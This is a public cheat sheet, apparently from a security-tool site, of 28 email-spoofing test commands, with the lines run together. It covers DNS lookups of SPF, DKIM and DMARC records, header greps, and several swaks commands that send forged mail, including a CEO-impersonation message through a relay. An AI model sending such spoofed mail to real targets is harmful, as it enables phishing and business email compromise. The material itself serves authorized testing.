Public, copy-ready DNS recon, SPF/DKIM/DMARC interpretation, authorized swaks spoof testing, and header analysis for authorized email security assessments. (28 payloads)
dig +short TXT example.comdig +short TXT _dmarc.example.comdig +short MX example.comdig +short TXT selector1._domainkey.example.comfor s in google selector1 selector2 default dkim k1 mail s1 s2 smtp; do echo "== $s =="; dig +short TXT ${s}._domainkey.example.com; donedig +short TXT example.com @8.8.8.8v=spf1 include:_spf.google.com ~allv=spf1 +alldig +short TXT example.com | grep -o 'include:[^ "]*'v=spf1 ... include:a include:b include:c include:d include:e include:f include:g ~alldig +short TXT _netblocks.google.comv=DMARC1; p=none; rua=mailto:[email protected]v=DMARC1; p=reject; sp=nonev=DMARC1; p=quarantine; pct=10v=DMARC1; p=reject; adkim=r; aspf=rswaks --to [email protected] --from [email protected] --server mail.target.com --header "Subject: SPF/DMARC test" --body "Authorized spoof test"swaks --to [email protected] --from [email protected] --server <target-mx> --ehlo attacker.testswaks --to [email protected] --from "CEO <[email protected]>" --header "From: CEO <[email protected]>" --server <relay>swaks --to [email protected] --from [email protected] --header "From: [email protected]" --server <relay>swaks --to [email protected] --from [email protected] --server mail.target.com --tls --quit-after RCPTgrep -i "Authentication-Results" received-email.emlgrep -iE "^(Received|Received-SPF):" received-email.emlgrep -i "DKIM-Signature" received-email.eml | grep -o 's=[^;]*'grep -i "Return-Path\|^From:" received-email.emldig +short TXT example.com | grep -ci spf1dig +short TXT example.com; echo 'check for: ?all / +all / ~all without -all'dig +short TXT _dmarc.example.com || echo 'NO DMARC — domain fully spoofable'nslookup -type=txt _dmarc.subdomain.example.comLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 28 Email Spoofing payloads for testing Email Spoofing & SPF/DKIM/DMARC vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Email Header Analyzer to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Email Spoofing payloads are completely free, with no account required. Everything runs in your browser.